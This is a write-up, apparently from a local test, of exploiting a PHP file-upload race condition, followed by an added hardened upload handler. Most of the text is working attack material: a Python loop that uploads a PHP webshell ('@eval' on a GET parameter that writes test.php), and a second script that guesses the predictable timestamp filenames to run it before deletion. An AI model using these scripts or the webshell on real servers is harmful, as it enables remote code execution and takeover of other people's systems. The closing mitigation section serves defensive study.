A file upload point with an arbitrary file upload. The source code was available, so the application was set up locally. First, a normal image is uploaded: the upload and the response are both normal.

Changing the extension to php, the page shows an error message but still returns a path.

Visiting that path shows only a PNG header. The error message mentions image-processing functions, which suggests the image is re-rendered (a second render) after upload.

Use the following project

https://github.com/gwjczwy/jpg_payload

to generate an image with an embedded payload.

After uploading it, visiting the file gives the same result: the payload does not survive the re-render.

Looking at the source, the core code shows that the file is first moved into place, then processed, and then the original file is deleted and a new file generated:

    $extend = pathinfo($data['file']['name']);
    $extend = '.'.strtolower($extend["extension"]);   // extension taken from the client-supplied name
    date_default_timezone_set('PRC');
    // predictable name: timestamp (12-hour clock) + rand(100, 999) + 'test' + extension
    $imgpath  = $data['img_dir'].'/'.date('Ymdhis', time()).rand(100, 999).'test'.$extend;
    $upload  = move_uploaded_file($data['file']['tmp_name'], $imgpath);   // file is already web-accessible here
    $imgpath  = "../common/".$imgpath;

    if(!$upload){
        echo 'parent.alert("請嘗試重新上傳!");';exit;
    }else{
        // .......
        // code that processes the file (re-render, delete original, write new file)
        // .......
    }

The idea is a race condition: one program keeps sending upload requests while another keeps requesting the uploaded file, hitting the window between move_uploaded_file and the deletion. The image upload request is exported from Burp as Python requests code with a plugin; it was written quickly and has no multithreading.

import requests

# Request exported from Burp; the host is redacted as xxxxxxx.
try:
    url = "http://xxxxxxx/upload.php"
    cookies = {"PHPSESSID": "1gmkmeqdg9sl8i4crprkm25884"}
    headers = {"Cache-Control": "max-age=0", "Sec-Ch-Ua": "\" Not;A Brand\";v=\"99\", \"Google Chrome\";v=\"97\", \"Chromium\";v=\"97\"", "Sec-Ch-Ua-Mobile": "?0", "Sec-Ch-Ua-Platform": "\"macOS\"", "Upgrade-Insecure-Requests": "1", "Origin": "", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundarym1ogNWdW0fVSBGcm", "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.99 Safari/537.36", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "navigate", "Sec-Fetch-Dest": "iframe", "Referer": "", "Accept-Encoding": "gzip, deflate", "Accept-Language": "zh-CN,zh;q=0.9"}
    # Multipart body (CRLF line endings): the "image" is a .php file whose code writes test.php when executed.
    data = "------WebKitFormBoundarym1ogNWdW0fVSBGcm\r\nContent-Disposition: form-data; name=\"file\"; filename=\"babyshell.php\"\r\nContent-Type: image/jpeg\r\n\r\n<?php\r\n@eval($_GET['id']);\r\nfile_put_contents('test.php', '');\r\n?>\r\n------WebKitFormBoundarym1ogNWdW0fVSBGcm--\r\n"
    # Upload in a loop so a fresh copy keeps appearing in the window before it is processed and deleted.
    while 1:
        requests.post(url, headers=headers, cookies=cookies, data=data)
except:
    pass

Then write a second program that keeps requesting the uploaded file:

import requests, time, random

# Guess the server-side name: date('Ymdhis') . rand(100, 999) . 'test' . $extend.
# The Ymdh part (2022012405) is fixed for this run; minutes and seconds come from the
# local clock, and only part of the rand(100, 999) range is tried here.
while 1:
    time1 = time.strftime("%M%S", time.localtime())
    path1 = '2022012405' + time1 + str(random.randint(100, 110))
    burp0_url = "http://xxxxxxxx/common/upload_img/" + path1 + "test.php"
    re1 = requests.get(burp0_url)
    if re1:   # a Response is truthy for status < 400, i.e. the file existed and was served
        print('okok')

Finally, after a few tens of seconds, visiting test.php shows that it was generated successfully.

Testing execution also works without problems.
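As an added example (not the application's code from this writeup), here is a hardened version of the upload handler shown above. It removes both conditions the race depends on: the raw upload is never placed under the web root before it has been validated and re-encoded, and the final name is random instead of a predictable timestamp plus rand(100, 999). The variable names follow the snippet; the function, its arguments and the quarantine directory are assumptions.

```php
<?php
// Hardened upload flow (added example). The client-supplied extension is ignored;
// the file type is determined from content, and the raw bytes never get a URL.
function safe_image_upload(array $file, string $webDir, string $quarantineDir): string
{
    if ($file['error'] !== UPLOAD_ERR_OK || !is_uploaded_file($file['tmp_name'])) {
        throw new RuntimeException('invalid upload');
    }
    // 1. Validate by content, not by the name the client chose.
    $info = @getimagesize($file['tmp_name']);
    $allowed = [IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    if ($info === false || !isset($allowed[$info[2]])) {
        throw new RuntimeException('not an allowed image');
    }
    $ext = $allowed[$info[2]];

    // 2. Move into a directory outside the document root (assumed to exist and be non-web-served).
    $work = tempnam($quarantineDir, 'up_');
    if ($work === false || !move_uploaded_file($file['tmp_name'], $work)) {
        throw new RuntimeException('move failed');
    }
    try {
        // 3. Re-encode (the "second render"); anything that is not pixel data is dropped.
        $img = $info[2] === IMAGETYPE_JPEG ? imagecreatefromjpeg($work) : imagecreatefrompng($work);
        if ($img === false) {
            throw new RuntimeException('decode failed');
        }
        // 4. Only the re-encoded result reaches the web directory, under an unguessable name
        //    whose extension comes from validation, so there is no window with a raw .php file.
        $final = $webDir . '/' . bin2hex(random_bytes(16)) . '.' . $ext;
        $ok = $ext === 'jpg' ? imagejpeg($img, $final, 90) : imagepng($img, $final);
        imagedestroy($img);
        if (!$ok) {
            throw new RuntimeException('encode failed');
        }
        chmod($final, 0644);
        return $final;
    } finally {
        @unlink($work); // the quarantined original is removed on every path
    }
}

// Usage mirroring the original handler (argument sources are assumed):
// $imgpath = safe_image_upload($_FILES['file'], $data['img_dir'], '/var/app/quarantine');
```

Serving the upload directory with PHP execution disabled (for example, an Apache or nginx rule that refuses to run scripts from it) is an additional layer that would have stopped this race even with the original code.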